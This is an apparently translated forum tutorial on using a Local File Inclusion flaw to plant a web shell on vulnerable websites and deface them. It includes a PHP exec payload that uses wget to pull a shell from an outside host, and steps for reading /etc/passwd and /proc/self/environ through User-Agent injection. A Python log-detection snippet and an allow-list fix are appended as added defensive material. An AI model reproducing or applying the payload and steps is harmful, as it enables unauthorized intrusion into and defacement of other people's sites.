Shell Upload using LFI method


To upload a shell by exploiting a Local File Inclusion (LFI) vulnerability, you first need to know some of the common parameters.

index.php?homepage=
index.php?page=
index.php?index2=

The things you need in order to upload a shell with LFI are:

1. Vulnerable Website
2. Shell
3. User-Agent Switcher ( Download )
4. Mozilla Firefox


The vulnerable sites I have are:


First, take a site with an LFI vulnerability (not only the sites from my list; you can also use sites you have found yourself, though you do need to have root access) and type /etc/passwd after it.
With that, you have the username & password needed to get root access.
I have already written a separate tutorial on how to crack the password hash and how to get root access; look it up and read it if you need it.


As the next step, change the path to /proc/self/environ. For the site I gave as an example, it will look like the picture below.

If checking /etc/passwd and /proc/self/environ as above works, you then need to use the extension called User-Agent Switcher in order to do remote code execution.

To edit the User Agent and change the code, follow the pictures shown below step by step.










When everything is done, refresh the website, press Ctrl+F, and search for "disable_functions".

disable_functions | no value | no value

If so, it is ready for the shell to be uploaded.





You can upload the shell using the command below.


<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


After uploading, the file needs to be renamed to a name ending in .php.

Once the shell has been uploaded, you will see it as in the picture below.


With that, the site is in your hands.
It is ready for you to edit index.php and put in your deface code.
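
From the defender's side, every step above leaves a trace in the web server's access log: the `page=` parameter carrying `/etc/passwd` or `/proc/self/environ`, and a User-Agent header that contains a PHP open tag. The following Python is an added example, not code from the original post; the log lines are constructed, and the names `classify` and `suspicious` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" format: request line, status, size, referer, user agent.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$'
)
SENSITIVE = ("/etc/passwd", "/proc/self/environ")  # the two paths this post requests

# Constructed sample log lines (documentation IP range, no real hosts).
SAMPLE = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=/etc/passwd '
    'HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET '
    '/index.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 900 "-" '
    '"<?php /* constructed */ ?>"',
]

def classify(line):
    """Return the sorted list of findings for one access-log line."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    findings = set()
    query = urlsplit(m["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded input.
        value = unquote(value).replace("\\", "/")
        if "../" in value:
            findings.add(f"traversal:{name}")
        if any(path in value for path in SENSITIVE):
            findings.add(f"sensitive-file:{name}")
    # A browser never sends a PHP open tag as its User-Agent.
    if "<?" in m["ua"]:
        findings.add("php-in-user-agent")
    return sorted(findings)

def suspicious(lines):
    """Return (client_ip, findings) for every parsed line with at least one finding."""
    hits = []
    for line in lines:
        found = classify(line)
        if found and found != ["unparsed"]:
            hits.append((LINE.match(line)["ip"], found))
    return hits
```

A `php-in-user-agent` hit together with a `/proc/self/environ` request from the same client is the pattern this post describes. On the application side, the fix is to map the `page` parameter to an allow-list of known files instead of using it as a path.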

(Note: I am neither a black hat nor a white hat. To put it most plainly, "I am not Hacker, but i love Hacking".)


